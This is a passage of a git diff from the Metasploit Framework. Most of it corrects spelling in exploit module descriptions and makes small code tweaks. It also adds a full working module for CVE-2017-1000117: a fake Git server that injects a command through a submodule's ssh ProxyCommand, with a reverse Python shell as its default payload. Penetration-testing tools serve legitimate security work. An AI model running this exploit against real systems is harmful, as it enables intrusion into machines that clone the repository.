datastore['HttpPassword'])}) + end + return send_request_cgi(params, timeout=5) + + end + + def exploit + + res = execute_cmdstager(:linemax => 800) + + if res + if res.code == 401 + fail_with(Failure::NoAccess, "Authentication failed: #{res.code} response") + elsif res.code == 404 + fail_with(Failure::NotFound, "Invalid XML-RPC endpoint: #{res.code} response") + else + fail_with(Failure::UnexpectedReply, "Unexpected HTTP code: #{res.code} response") + end + else + print_good('Request returned without status code, usually indicates success. Passing to handler..') + handler + end + + end + +end diff --git a/modules/exploits/linux/http/symantec_messaging_gateway_exec.rb b/modules/exploits/linux/http/symantec_messaging_gateway_exec.rb index e4047371ba..139d8704c8 100644 --- a/modules/exploits/linux/http/symantec_messaging_gateway_exec.rb +++ b/modules/exploits/linux/http/symantec_messaging_gateway_exec.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote terminal command under the context of the web server user which is root. backupNow.do endpoint takes several user inputs and then pass them to the internal service which is responsible for executing - operating system command. One of the user input is being passed to the service without proper validation. That cause an command + operating system command. One of the user input is being passed to the service without proper validation. That cause a command injection vulnerability. But given parameters, such a SSH ip address, port and credentials are validated before executing terminal command. Thus, you need to configure your own SSH service and set the required parameter during module usage. diff --git a/modules/exploits/linux/http/trend_micro_imsva_exec.rb b/modules/exploits/linux/http/trend_micro_imsva_exec.rb index 7ae12253be..5b6991a5dc 100644 --- a/modules/exploits/linux/http/trend_micro_imsva_exec.rb +++ b/modules/exploits/linux/http/trend_micro_imsva_exec.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote saveCert.imss endpoint takes several user inputs and performs blacklisting. After that it use them as argument of predefined operating system command - without proper sanitation. However,due to improper blacklisting rule it's possible to inject + without proper sanitation. However, due to improper blacklisting rule it's possible to inject arbitrary commands into it. InterScan Messaging Security prior to 9.1.-1600 affected by this issue. This module was tested against IMSVA 9.1-1600. diff --git a/modules/exploits/linux/http/trueonline_billion_5200w_rce.rb b/modules/exploits/linux/http/trueonline_billion_5200w_rce.rb index d856f8f1e6..0502ebe3d0 100644 --- a/modules/exploits/linux/http/trueonline_billion_5200w_rce.rb +++ b/modules/exploits/linux/http/trueonline_billion_5200w_rce.rb @@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'TrueOnline / Billion 5200W-T Router Unauthenticated Command Injection', 'Description' => %q{ - TrueOnline is a major ISP in Thailand, and it distributes a customised version of - the Billion 5200W-T router. This customised version has at least two command injection + TrueOnline is a major ISP in Thailand, and it distributes a customized version of + the Billion 5200W-T router. This customized version has at least two command injection vulnerabilities, one authenticated and one unauthenticated, on different firmware versions. This module will attempt to exploit the unauthenticated injection first, and if that fails, it will attempt to exploit the authenticated injection. diff --git a/modules/exploits/linux/http/trueonline_p660hn_v1_rce.rb b/modules/exploits/linux/http/trueonline_p660hn_v1_rce.rb index 8f385b0052..b854cb5688 100644 --- a/modules/exploits/linux/http/trueonline_p660hn_v1_rce.rb +++ b/modules/exploits/linux/http/trueonline_p660hn_v1_rce.rb @@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'TrueOnline / ZyXEL P660HN-T v1 Router Unauthenticated Command Injection', 'Description' => %q{ - TrueOnline is a major ISP in Thailand, and it distributes a customised version of - the ZyXEL P660HN-T v1 router. This customised version has an unauthenticated command + TrueOnline is a major ISP in Thailand, and it distributes a customized version of + the ZyXEL P660HN-T v1 router. This customized version has an unauthenticated command injection vulnerability in the remote log forwarding page. This module was tested in an emulated environment, as the author doesn't have access to the Thai router any more. Any feedback should be sent directly to the module's author, as well as diff --git a/modules/exploits/linux/http/trueonline_p660hn_v2_rce.rb b/modules/exploits/linux/http/trueonline_p660hn_v2_rce.rb index 218f3447b0..577c36ca3b 100644 --- a/modules/exploits/linux/http/trueonline_p660hn_v2_rce.rb +++ b/modules/exploits/linux/http/trueonline_p660hn_v2_rce.rb @@ -14,8 +14,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'TrueOnline / ZyXEL P660HN-T v2 Router Authenticated Command Injection', 'Description' => %q{ - TrueOnline is a major ISP in Thailand, and it distributes a customised version of - the ZyXEL P660HN-T v2 router. This customised version has an authenticated command injection + TrueOnline is a major ISP in Thailand, and it distributes a customized version of + the ZyXEL P660HN-T v2 router. This customized version has an authenticated command injection vulnerability in the remote log forwarding page. This can be exploited using the "supervisor" account that comes with a default password on the device. This module was tested in an emulated environment, as the author doesn't have access to the diff --git a/modules/exploits/linux/http/webcalendar_settings_exec.rb b/modules/exploits/linux/http/webcalendar_settings_exec.rb index b5bf903a02..0555dfb873 100644 --- a/modules/exploits/linux/http/webcalendar_settings_exec.rb +++ b/modules/exploits/linux/http/webcalendar_settings_exec.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "WebCalendar 1.2.4 Pre-Auth Remote Code Injection", 'Description' => %q{ - This modules exploits a vulnerability found in k5n.us WebCalendar, version 1.2.4 or + This module exploits a vulnerability found in k5n.us WebCalendar, version 1.2.4 or less. If not removed, the settings.php script meant for installation can be update by an attacker, and then inject code in it. This allows arbitrary code execution as www-data. diff --git a/modules/exploits/linux/local/desktop_privilege_escalation.rb b/modules/exploits/linux/local/desktop_privilege_escalation.rb index 32043f28b4..40b430b85d 100644 --- a/modules/exploits/linux/local/desktop_privilege_escalation.rb +++ b/modules/exploits/linux/local/desktop_privilege_escalation.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Local when it is entered for unlocking the screen or for doing administrative actions using PolicyKit. Then, it escalates to root privileges using sudo and the stolen user password. It exploits the design weakness that there is no trusted channel for transferring the - password from the keyboard to the actual password verificatition against the shadow file + password from the keyboard to the actual password verification against the shadow file (which is running as root since /etc/shadow is only readable to the root user). Both screensavers (xscreensaver/gnome-screensaver) and PolicyKit use a component running under the current user account to query for the password and then pass it to a setuid-root binary diff --git a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb index 21ff14a0d1..59ed4e51f8 100644 --- a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb +++ b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb @@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Local %Q{ IMG=`(echo "FROM scratch"; echo "CMD a") | docker build -q - | awk "END { print \\\\$NF }"` - EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}" + EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}; chmod +x #{exploit_path}" docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT" docker rmi -f $IMG #{exploit_path} diff --git a/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb b/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb index 9df1bba9e8..7cdbcfdd14 100644 --- a/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb +++ b/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb @@ -14,13 +14,13 @@ class MetasploitModule < Msf::Exploit::Local super(update_info(info, 'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation', 'Description' => %q{ - This module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently + This module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently only works against Ubuntu 16.04 (not 16.04.1) with kernel 4.4.0-21-generic. Several conditions have to be met for successful exploitation: Ubuntu: 1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such) - 2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile + 2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile Kernel 4.4.0-31-generic and newer are not vulnerable. We write the ascii files and compile on target instead of locally since metasm bombs for not diff --git a/modules/exploits/linux/local/sock_sendpage.rb b/modules/exploits/linux/local/sock_sendpage.rb index 1eb643bcc6..1e27130525 100644 --- a/modules/exploits/linux/local/sock_sendpage.rb +++ b/modules/exploits/linux/local/sock_sendpage.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Local 'Description' => %q{ The Linux kernel failed to properly initialize some entries the proto_ops struct for several protocols, leading to NULL being - derefenced and used as a function pointer. By using mmap(2) to map + dereferenced and used as a function pointer. By using mmap(2) to map page 0, an attacker can execute arbitrary code in the context of the kernel. diff --git a/modules/exploits/linux/misc/opennms_java_serialize.rb b/modules/exploits/linux/misc/opennms_java_serialize.rb index a36ef01a6c..553f8375a6 100644 --- a/modules/exploits/linux/misc/opennms_java_serialize.rb +++ b/modules/exploits/linux/misc/opennms_java_serialize.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'OpenNMS Java Object Unserialization Remote Code Execution', 'Description' => %q( This module exploits a vulnerability in the OpenNMS Java object which allows - an unauthenticated attacker to run arbitary code against the system. + an unauthenticated attacker to run arbitrary code against the system. ), 'Author' => [ diff --git a/modules/exploits/linux/postgres/postgres_payload.rb b/modules/exploits/linux/postgres/postgres_payload.rb index 48fb7b2e61..01a79802b4 100644 --- a/modules/exploits/linux/postgres/postgres_payload.rb +++ b/modules/exploits/linux/postgres/postgres_payload.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ On some default Linux installations of PostgreSQL, the postgres service account may write to the /tmp directory, and - may source UDF Shared Libraries's from there as well, allowing + may source UDF Shared Libraries from there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to diff --git a/modules/exploits/linux/samba/lsa_transnames_heap.rb b/modules/exploits/linux/samba/lsa_transnames_heap.rb index 906b7b2cc6..eaf9a7d747 100644 --- a/modules/exploits/linux/samba/lsa_transnames_heap.rb +++ b/modules/exploits/linux/samba/lsa_transnames_heap.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the TALLOC chunk overwrite method (credit Ramon and Adriano), which only works with Samba - versions 3.0.21-3.0.24. Additonally, this module will not work + versions 3.0.21-3.0.24. Additionally, this module will not work when the Samba "log level" parameter is higher than "2". }, 'Author' => diff --git a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb index 6b5b51d625..e08819eba0 100644 --- a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb +++ b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Exim and Dovecot Insecure Configuration Command Injection', 'Description' => %q{ This module exploits a command injection vulnerability against Dovecot with - Exim using the "use_shell" option. It uses the sender's address to inject arbitary + Exim using the "use_shell" option. It uses the sender's address to inject arbitrary commands, since this is one of the user-controlled variables. It has been successfully tested on Debian Squeeze using the default Exim4 with the dovecot-common packages. diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb index d4e810f4c0..012cbc12bb 100644 --- a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb @@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote Windows Vista SP2 + Firefox 39.0 and Flash 18.0.0.203, Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, - Windows 7 SP1 (32-bit), IE9 and Adobe Flash Flash 18.0.0.203, + Windows 7 SP1 (32-bit), IE9 and Adobe Flash 18.0.0.203, Windows 7 SP1 (32-bit), Firefox and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194, windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.203, diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb index f0a208ad31..7176ff56ec 100644 --- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb @@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote the chrome-based defineProperty method is made available. With the defineProperty method, functions belonging to window and document can be - overriden with a function that gets called from chrome-privileged context. From here, + overridden with a function that gets called from chrome-privileged context. From here, another vulnerability in the crypto.generateCRMFRequest function is used to "peek" into the context's private scope. Since the window does not have a chrome:// URL, the insecure parts of Components.classes are not available, so instead the AddonManager diff --git a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb index fdc0f0c2c9..19e1716081 100644 --- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb +++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb @@ -65,9 +65,9 @@ class MetasploitModule < Msf::Exploit::Remote end def generate_html - html = %Q|Loading, Please Wait...\n| + html = %Q|Loading, Please Wait...\n| + html << %Q|\n| html << %Q|

Addon required to view this page. [Install]

\n| - html << %Q|\n| html << %Q|| return html end diff --git a/modules/exploits/multi/browser/itms_overflow.rb b/modules/exploits/multi/browser/itms_overflow.rb index 3be0c76250..40370f7411 100644 --- a/modules/exploits/multi/browser/itms_overflow.rb +++ b/modules/exploits/multi/browser/itms_overflow.rb @@ -98,11 +98,14 @@ class MetasploitModule < Msf::Exploit::Remote # Return back an example URL. Using an iframe doesn't work with all # browsers, but that's easy enough to fix if you need to. return String(<<-EOS) -iTunes loading . . . + + +iTunes loading . . . + +

iTunes should open automatically, but if it doesn't, click to continue.

- EOS diff --git a/modules/exploits/multi/browser/java_verifier_field_access.rb b/modules/exploits/multi/browser/java_verifier_field_access.rb index 9ad956d820..124b95a3fb 100644 --- a/modules/exploits/multi/browser/java_verifier_field_access.rb +++ b/modules/exploits/multi/browser/java_verifier_field_access.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Java Applet Field Bytecode Verifier Cache Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability in HotSpot bytecode verifier where an invalid - optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficent + optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations. }, diff --git a/modules/exploits/multi/fileformat/swagger_param_inject.rb b/modules/exploits/multi/fileformat/swagger_param_inject.rb index b716b9df65..2caa9da10b 100644 --- a/modules/exploits/multi/fileformat/swagger_param_inject.rb +++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'JSON Swagger CodeGen Parameter Injector', 'Description' => %q{ - This module generates a Open API Specification 2.0 (Swagger) compliant + This module generates an Open API Specification 2.0 (Swagger) compliant json document that includes payload insertion points in parameters. In order for the payload to be executed, an attacker must convince diff --git a/modules/exploits/multi/http/eventlog_file_upload.rb b/modules/exploits/multi/http/eventlog_file_upload.rb index e1071f2db0..628cdabe5c 100644 --- a/modules/exploits/multi/http/eventlog_file_upload.rb +++ b/modules/exploits/multi/http/eventlog_file_upload.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a file upload vulnerability in ManageEngine Eventlog Analyzer. The vulnerability exists in the agentUpload servlet which accepts unauthenticated - file uploads and handles zip file contents in a insecure way. By combining both + file uploads and handles zip file contents in an insecure way. By combining both weaknesses a remote attacker can achieve remote code execution. This module has been tested successfully on versions v7.0 - v9.9 b9002 in Windows and Linux. Versions between 7.0 and < 8.1 are only exploitable via EAR deployment in the JBoss server, diff --git a/modules/exploits/multi/http/git_submodule_command_exec.rb b/modules/exploits/multi/http/git_submodule_command_exec.rb new file mode 100644 index 0000000000..4b19fe57bd --- /dev/null +++ b/modules/exploits/multi/http/git_submodule_command_exec.rb @@ -0,0 +1,200 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Malicious Git HTTP Server For CVE-2017-1000117', + 'Description' => %q( + This module exploits CVE-2017-1000117, which affects Git + version 2.7.5 and lower. A submodule of the form 'ssh://' can be passed + parameters from the username incorrectly. This can be used to inject + commands to the operating system when the submodule is cloned. + + This module creates a fake git repository which contains a submodule + containing the vulnerability. The vulnerability is triggered when the + submodules are initialised. + ), + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2017-1000117'], + ['URL', 'http://seclists.org/oss-sec/2017/q3/280' ] + ], + 'DisclosureDate' => 'Aug 10 2017', + 'Targets' => + [ + [ + 'Automatic', + { + 'Platform' => [ 'unix' ], + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'python' + } + } + } + ] + ], + 'DefaultOptions' => + { + 'Payload' => 'cmd/unix/reverse_python' + }, + 'DefaultTarget' => 0 + ) + ) + + register_options( + [ + OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']), + OptString.new('GIT_SUBMODULE', [false, 'The path to use as the malicious git submodule (empty for random)', '']) + ] + ) + end + + def setup + @repo_data = { + git: { files: {} } + } + setup_git + super + end + + def setup_git + # URI must start with a / + unless git_uri && git_uri =~ /^\// + fail_with(Failure::BadConfig, 'GIT_URI must start with a /') + end + + payload_cmd = payload.encoded + " &" + payload_cmd = Rex::Text.to_hex(payload_cmd, '%') + + submodule_path = datastore['GIT_SUBMODULE'] + if submodule_path.blank? + submodule_path = Rex::Text.rand_text_alpha(rand(8) + 2).downcase + end + + gitmodules = "[submodule \"#{submodule_path}\"] +path = #{submodule_path} +url = ssh://-oProxyCommand=#{payload_cmd}/ +" + sha1, content = build_object('blob', gitmodules) + @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content + + tree = "100644 .gitmodules\0#{[sha1].pack('H*')}" + tree += "160000 #{submodule_path}\0#{[sha1].pack('H*')}" + sha1, content = build_object('tree', tree) + @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content + + ## build the supposed commit that dropped this file, which has a random user/company + email = Rex::Text.rand_mail_address + first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten + full_name = "#{first.capitalize} #{last.capitalize}" + tstamp = Time.now.to_i + author_time = rand(tstamp) + commit_time = rand(author_time) + tz_off = rand(10) + commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \ + "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \ + "\n" \ + "Initial commit to open git repository for #{company}!\n" + + sha1, content = build_object('commit', "tree #{sha1}\n#{commit}") + @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content + @repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n" + @repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n" + end + + # Build's a Git object + def build_object(type, content) + # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html + header = "#{type} #{content.size}\0" + store = header + content + [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)] + end + + # Returns the Git object path name that a file with the provided SHA1 will reside in + def get_path(sha1) + sha1[0...2] + '/' + sha1[2..40] + end + + def exploit + super + end + + def primer + # add the git and mercurial URIs as necessary + hardcoded_uripath(git_uri) + print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}") + end + + # handles routing any request to the mock git, mercurial or simple HTML as necessary + def on_request_uri(cli, req) + # if the URI is one of our repositories and the user-agent is that of git/mercurial + # send back the appropriate data, otherwise just show the HTML version + user_agent = req.headers['User-Agent'] + if user_agent && user_agent =~ /^git\// && req.uri.start_with?(git_uri) + do_git(cli, req) + return + end + + do_html(cli, req) + end + + # simulates a Git HTTP server + def do_git(cli, req) + # determine if the requested file is something we know how to serve from our + # fake repository and send it if so + req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '') + if @repo_data[:git][:files].key?(req_file) + vprint_status("Sending Git #{req_file}") + send_response(cli, @repo_data[:git][:files][req_file]) + else + vprint_status("Git #{req_file} doesn't exist") + send_not_found(cli) + end + end + + # simulates an HTTP server with simple HTML content that lists the fake + # repositories available for cloning + def do_html(cli, _req) + resp = create_response + resp.body = < + Public Repositories + +

Here are our public repositories:

+
    +HTML + this_git_uri = URI.parse(get_uri).merge(git_uri) + resp.body << "
  • Git (clone with `git clone #{this_git_uri}`)
    • " + resp.body << < + + +HTML + + cli.send_response(resp) + end + + # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI + def git_uri + return @git_uri if @git_uri + if datastore['GIT_URI'].blank? + @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git' + else + @git_uri = datastore['GIT_URI'] + end + end +end diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb index f46b3b7913..b6cecdbe60 100644 --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "Sun/Oracle GlassFish Server Authenticated Code Execution", 'Description' => %q{ - This module logs in to an GlassFish Server (Open Source or Commercial) using various + This module logs in to a GlassFish Server (Open Source or Commercial) using various methods (such as authentication bypass, default credentials, or user-supplied login), and deploys a malicious war file in order to get remote code execution. It has been tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x. Newer diff --git a/modules/exploits/multi/http/ispconfig_php_exec.rb b/modules/exploits/multi/http/ispconfig_php_exec.rb index b264121033..952b259ff6 100644 --- a/modules/exploits/multi/http/ispconfig_php_exec.rb +++ b/modules/exploits/multi/http/ispconfig_php_exec.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ ISPConfig allows an authenticated administrator to export language settings into a PHP script which is intended to be reuploaded later to restore language settings. This feature - can be abused to run aribtrary PHP code remotely on the ISPConfig server. + can be abused to run aribitrary PHP code remotely on the ISPConfig server. This module was tested against version 3.0.5.2. }, diff --git a/modules/exploits/multi/http/jboss_seam_upload_exec.rb b/modules/exploits/multi/http/jboss_seam_upload_exec.rb index 972fa6094a..3476298175 100644 --- a/modules/exploits/multi/http/jboss_seam_upload_exec.rb +++ b/modules/exploits/multi/http/jboss_seam_upload_exec.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'JBoss Seam 2 File Upload and Execute', 'Description' => %q{ - Versions of the JBoss Seam 2 framework < 2.2.1CR2 fails to properly + Versions of the JBoss Seam 2 framework < 2.2.1CR2 fails to properly sanitize inputs to some JBoss Expression Language expressions. As a result, attackers can gain remote code execution through the application server. This module leverages RCE to upload and execute diff --git a/modules/exploits/multi/http/jira_hipchat_template.rb b/modules/exploits/multi/http/jira_hipchat_template.rb index 02f4e74df2..cf434701df 100644 --- a/modules/exploits/multi/http/jira_hipchat_template.rb +++ b/modules/exploits/multi/http/jira_hipchat_template.rb @@ -17,8 +17,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => "Atlassian HipChat for Jira Plugin Velocity Template Injection", 'Description' => %q{ Atlassian Hipchat is a web service for internal instant messaging. A plugin is available - for Jira that allows team collibration at real time. A message can be used to inject Java - code into a Velocity template, and gain code exeuction as Jira. Authentication is required + for Jira that allows team collaboration at real time. A message can be used to inject Java + code into a Velocity template, and gain code execution as Jira. Authentication is required to exploit this vulnerability, and you must make sure the account you're using isn't protected by captcha. By default, Java payload will be used because it is cross-platform, but you can also specify which native payload you want (Linux or Windows). diff --git a/modules/exploits/multi/http/joomla_http_header_rce.rb b/modules/exploits/multi/http/joomla_http_header_rce.rb index b5e1e5e8ad..7c2effef87 100644 --- a/modules/exploits/multi/http/joomla_http_header_rce.rb +++ b/modules/exploits/multi/http/joomla_http_header_rce.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user supplied headers in the databases session table it's possible to truncate the input by sending an UTF-8 character. The custom created payload is then executed once the session is read - from the databse. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. + from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1. diff --git a/modules/exploits/multi/http/manageengine_auth_upload.rb b/modules/exploits/multi/http/manageengine_auth_upload.rb index 43d06e0237..89dd9e9495 100644 --- a/modules/exploits/multi/http/manageengine_auth_upload.rb +++ b/modules/exploits/multi/http/manageengine_auth_upload.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote For IT360 targets, enter the RPORT of the ServiceDesk instance (usually 8400). All versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer, SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this - module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been + module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been tested successfully in Windows and Linux on several versions. }, 'Author' => diff --git a/modules/exploits/multi/http/mediawiki_thumb.rb b/modules/exploits/multi/http/mediawiki_thumb.rb index 26729a49f4..bebc6eff52 100644 --- a/modules/exploits/multi/http/mediawiki_thumb.rb +++ b/modules/exploits/multi/http/mediawiki_thumb.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'MediaWiki Thumb.php Remote Command Execution', 'Description' => %q{ MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11, - when DjVu or PDF file upload support is enabled, allows remote unauthenticated + when DjVu or PDF file upload support is enabled, allows remote unauthenticated users to execute arbitrary commands via shell metacharacters. If no target file is specified this module will attempt to log in with the provided credentials to upload a file (.DjVu) to use for exploitation. diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 18bedbd89f..daaebfc86b 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote 1. This script may be invoked remotely without requiring authentication to any MT instance. 2. Through a crafted POST request, it is possible to invoke particular - database migration functions (i.e functions that bring the existing + database migration functions (i.e. functions that bring the existing database up-to-date with an updated codebase) by name and with particular parameters. 3. A particular migration function, core_drop_meta_for_table, allows diff --git a/modules/exploits/multi/http/nibbleblog_file_upload.rb b/modules/exploits/multi/http/nibbleblog_file_upload.rb index 913e0227e3..4e1dfa9d03 100644 --- a/modules/exploits/multi/http/nibbleblog_file_upload.rb +++ b/modules/exploits/multi/http/nibbleblog_file_upload.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote info, 'Name' => 'Nibbleblog File Upload Vulnerability', 'Description' => %q{ - Nibbleblog contains a flaw that allows a authenticated remote + Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3. }, diff --git a/modules/exploits/multi/http/openmediavault_cmd_exec.rb b/modules/exploits/multi/http/openmediavault_cmd_exec.rb index 2cf8fe4ae0..f02ae13f40 100644 --- a/modules/exploits/multi/http/openmediavault_cmd_exec.rb +++ b/modules/exploits/multi/http/openmediavault_cmd_exec.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'OpenMediaVault Cron Remote Command Execution', 'Description' => %q{ - OpenMediaVault allows an authenticated user to create cron jobs as aribtrary users on the system. + OpenMediaVault allows an authenticated user to create cron jobs as arbitrary users on the system. An attacker can abuse this to run arbitrary commands as any user available on the system (including root). }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/multi/http/oracle_reports_rce.rb b/modules/exploits/multi/http/oracle_reports_rce.rb index 6e6579a61b..77614ef7c2 100644 --- a/modules/exploits/multi/http/oracle_reports_rce.rb +++ b/modules/exploits/multi/http/oracle_reports_rce.rb @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote used to write a shell from a remote url to a known local path disclosed from the previous vulnerability. - The local path being accessable from an URL allows an attacker to perform the remote code + The local path being accessible from an URL allows an attacker to perform the remote code execution using, for example, a .jsp shell. This module was tested successfully on Windows and Oracle Forms and Reports 10.1. diff --git a/modules/exploits/multi/http/phpmailer_arg_injection.rb b/modules/exploits/multi/http/phpmailer_arg_injection.rb index 41e0dcbb03..c56f4c86fd 100644 --- a/modules/exploits/multi/http/phpmailer_arg_injection.rb +++ b/modules/exploits/multi/http/phpmailer_arg_injection.rb @@ -68,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote while wait_time > 0 sleep(sleep_time) wait_time -= sleep_time - res = send_request_cgi( + res = send_request_cgi!( 'method' => 'GET', 'uri' => trigger_uri ) diff --git a/modules/exploits/multi/http/phptax_exec.rb b/modules/exploits/multi/http/phptax_exec.rb index 9eb8631641..d8ea1aae0c 100644 --- a/modules/exploits/multi/http/phptax_exec.rb +++ b/modules/exploits/multi/http/phptax_exec.rb @@ -14,7 +14,7 @@ class MetasploitModule < 